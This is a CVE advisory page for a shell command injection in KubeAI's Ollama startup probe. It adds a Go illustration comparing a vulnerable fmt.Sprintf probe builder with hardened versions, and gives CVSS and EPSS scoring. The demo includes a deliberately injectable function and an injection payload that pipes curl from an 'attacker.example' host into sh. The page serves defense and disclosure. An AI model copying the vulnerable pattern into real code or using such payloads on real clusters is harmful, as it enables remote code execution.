CVE-2026-34940 · HIGH 8.8 · EPSS percentile 35.6%

CVE-2026-34940

Description

KubeAI is an AI inference operator for Kubernetes. Prior to version 0.23.2, the ollamaStartupProbeScript() function in internal/modelcontroller/engine_ollama.go builds a shell command string with fmt.Sprintf from unsanitized model URL components (ref, modelParam). The resulting string is executed via bash -c as a Kubernetes startup probe. An attacker who can create or update Model custom resources can therefore inject arbitrary shell commands that run inside the model server pods; no user interaction is required, and the injected commands run with the pod's service account and network position. The issue is fixed in 0.23.2.
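The pattern the advisory describes, as an added illustration that is not KubeAI's code: a probe script assembled with fmt.Sprintf from attacker-controlled fields, next to a hardened version that allowlists the fields, shell-quotes them, and (better still) drops bash -c for an exec-style argv. The command layout (ollama pull / ollama run), the allowlist regexes and the function names are assumptions made for this example, not the project's actual API or its 0.23.2 fix.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// vulnerableProbeScript is a hypothetical reconstruction of the flawed pattern:
// ref and modelParam come straight from a Model custom resource and are
// interpolated into a string that the startup probe hands to `bash -c`.
// Any shell metacharacter in either field becomes part of the command.
func vulnerableProbeScript(ref, modelParam string) string {
	return fmt.Sprintf("ollama pull %s && ollama run %s %s", ref, ref, modelParam)
}

// Allowlists for the two attacker-controlled fields. The shapes are assumptions
// (an OCI-style "name[:tag]" ref and a single "key=value" parameter).
var (
	refPattern   = regexp.MustCompile(`^[a-z0-9]+(?:[._/-][a-z0-9]+)*(?::[A-Za-z0-9._-]{1,64})?$`)
	paramPattern = regexp.MustCompile(`^[A-Za-z0-9_]{1,64}=[A-Za-z0-9._-]{1,128}$`)
)

func validateRef(ref string) error {
	if !refPattern.MatchString(ref) {
		return fmt.Errorf("model ref %q contains characters outside the allowlist", ref)
	}
	return nil
}

func validateParam(p string) error {
	if p != "" && !paramPattern.MatchString(p) {
		return fmt.Errorf("model parameter %q contains characters outside the allowlist", p)
	}
	return nil
}

// shellQuote single-quotes s for POSIX sh/bash, closing and reopening the
// quote around any embedded single quote. Defense in depth behind the allowlist.
func shellQuote(s string) string {
	return "'" + strings.ReplaceAll(s, "'", `'\''`) + "'"
}

// safeProbeScript validates both fields and quotes them before they are
// placed in the bash -c string. Inputs that fail the allowlist never reach Sprintf.
func safeProbeScript(ref, modelParam string) (string, error) {
	if err := validateRef(ref); err != nil {
		return "", err
	}
	if err := validateParam(modelParam); err != nil {
		return "", err
	}
	script := fmt.Sprintf("ollama pull %s && ollama run %s", shellQuote(ref), shellQuote(ref))
	if modelParam != "" {
		script += " " + shellQuote(modelParam)
	}
	return script, nil
}

// probeArgv avoids the shell entirely: each field is its own argv element, the
// form an exec-style probe (corev1.ExecAction.Command) takes, so there is no
// string for metacharacters to break out of.
func probeArgv(ref, modelParam string) ([]string, error) {
	if err := validateRef(ref); err != nil {
		return nil, err
	}
	if err := validateParam(modelParam); err != nil {
		return nil, err
	}
	argv := []string{"ollama", "pull", ref}
	if modelParam != "" {
		argv = append(argv, modelParam)
	}
	return argv, nil
}

func main() {
	// Constructed payload: a ref that terminates the intended command and appends its own.
	payload := "llama3; curl http://attacker.example/x | sh #"
	fmt.Println("vulnerable:", vulnerableProbeScript(payload, ""))
	if _, err := safeProbeScript(payload, ""); err != nil {
		fmt.Println("hardened rejects:", err)
	}
	s, _ := safeProbeScript("llama3:8b", "num_ctx=4096")
	fmt.Println("hardened accepts:", s)
}
```

Validation before quoting matters more than quoting alone: once a value is a separate argv element or is strictly allowlisted, a later refactor that concatenates strings cannot reopen the hole. Since the precondition is create/update on Model resources (PR:L in the vector), auditing which subjects hold that RBAC verb on the Model CRD is the first check to run on a cluster that cannot upgrade immediately.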

Scoring

CVSS 3.1: 8.8 (HIGH)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.45% probability of exploitation · percentile 35.6% · scored 2026-06-19T12:03:05Z
Published: 2026-04-06
Last modified: 2026-04-15

Underlying weaknesses · 1

CWE-78

References

  1. https://github.com/kubeai-project/kubeai/security/advisories/GHSA-324q-cwx9-7crr


Type: Weakness
Target: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (cwe-78)
Confidence: 0%
Tier: live

Related by meaning · 6

Nearest entities by semantic similarity across the cs-graph corpus.

CVE: CVE-2026-44345
CVE: CVE-2026-29955
CVE: CVE-2025-69902
CVE: CVE-2026-44346
CVE: CVE-2025-63389
CVE: CVE-2026-39884
Sourced from NVD + FIRST.org EPSS. Curated for EU compliance use cases by Adam Lundqvist, Founder at SQUR.